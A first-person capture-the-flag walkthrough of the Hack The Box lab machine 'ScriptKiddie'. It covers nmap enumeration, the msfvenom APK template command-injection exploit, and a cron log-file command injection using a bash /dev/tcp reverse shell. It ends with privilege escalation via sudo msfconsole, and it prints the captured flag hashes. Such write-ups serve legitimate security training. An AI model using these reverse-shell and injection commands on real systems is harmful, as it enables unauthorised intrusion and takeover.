Hack-The-Box-walkthrough[ScriptKiddie]

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 06 Feb 2021
IP: 10.10.10.226

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/ScriptKiddie]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.226
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Port 5000 Webapp

Some kind of hacking tool.

When generating any windows or linux payload using the website on port 5000 we discover a /static/payloads/name.exe of generated payloads where we can download from:

1
2
3
4
5
6
7
8
9
payload: windows/meterpreter/reverse_tcp
LHOST: 10.10.14.3
LPORT: 4444
template: None
download: 122f1def6a8b.exe
expires: 5 mins


http://10.10.10.226:5000/static/payloads/122f1def6a8b.exe

We also see that we can provide a template for given payload type we are going to generate

Also there is APK template allowed and after some googling we found out exploit module for APK template which uses command injection:

  • Rapid7 Metasploit Framework msfvenom APK Template Command Injection

We generated the following apk file and we going to use it as template:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) >set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.apk yes The APK file name


Payload options (cmd/unix/reverse_netcat):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

**DisablePayloadHandler: True (no handler will be created!)**


Exploit target:

Id Name
-- ----
0 Automatic

and then got a shell :)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[~/hackthebox/machine/ScriptKiddie]
└─# nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:56260.
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
whoami
kid
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$ cd
cd
kid@scriptkiddie:~$ ls
ls
html logs snap user.txt
kid@scriptkiddie:~$ cat user.txt
cat user.txt
b8f1aa40582cab9d40ac5866fbb13ec1

and the user flag…

get root

There is also a second user of name pwn.

After a shell on the box we found a script running as pwn:

1
2
3
4
5
6
7
8
9
10
11
12
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Interesting Pspy64 findings:

1
2
3
4
5
6
7
8
2021/02/07 06:36:42 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
2021/02/07 06:37:19 CMD: UID=1001 PID=409118 | rm /tmp/f
2021/02/07 06:37:19 CMD: UID=1001 PID=409122 | nc 10.10.16.117 9000
2021/02/07 06:37:19 CMD: UID=1001 PID=409121 | /bin/sh -i
2021/02/07 06:37:19 CMD: UID=1001 PID=409120 | cat /tmp/f
2021/02/07 06:38:01 CMD: UID=0 PID=409123 | /usr/sbin/CRON -f
2021/02/07 06:38:01 CMD: UID=0 PID=409125 | find /home/kid/html/static/payloads/ -type f -mmin +5 -delete
2021/02/07 06:38:01 CMD: UID=0 PID=409124 | /bin/sh -c find /home/kid/html/static/payloads/ -type f -mmin +5 -delete

After quick testing for command injection inside /home/kid/logs/hackers file we were able to put two spaces and then semicolon with our bash reverse shell in order to get command execution (We also commented out the rest of the nmap command with ‘#’ in the script in order to escape the redirection to /dev/null output):

1
;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1' #

Results:

1
echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1' #" >> hackers

then get a reverse shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root💀kali)-[~]
└─# nc -lvp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:57604.
bash: cannot set terminal process group (842): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$ whoami
whoami
pwn
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

finally get the root flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo /opt/metasploit-framework-6.0.9/msfconsole

.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit

=[ metasploit v6.0.9-dev ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: To save all commands executed since start up to a file, use the makerc command

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > id
stty: 'standard input': Inappropriate ioctl for device
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > whoami
stty: 'standard input': Inappropriate ioctl for device
[*] exec: whoami

root
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > pwd
stty: 'standard input': Inappropriate ioctl for device
[*] exec: pwd

/home/pwn
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > cd /root
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > ls
stty: 'standard input': Inappropriate ioctl for device
[*] exec: ls

root.txt
snap
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > cat root.txt
stty: 'standard input': Inappropriate ioctl for device
[*] exec: cat root.txt

f485b5d61b464bdd4fcb17809ad8fa8b
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device

Summary of knowledge

  • Rapid7 Metasploit Framework msfvenom APK Template Command Injection
  • cron job and Permissions misconfigured privesc

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…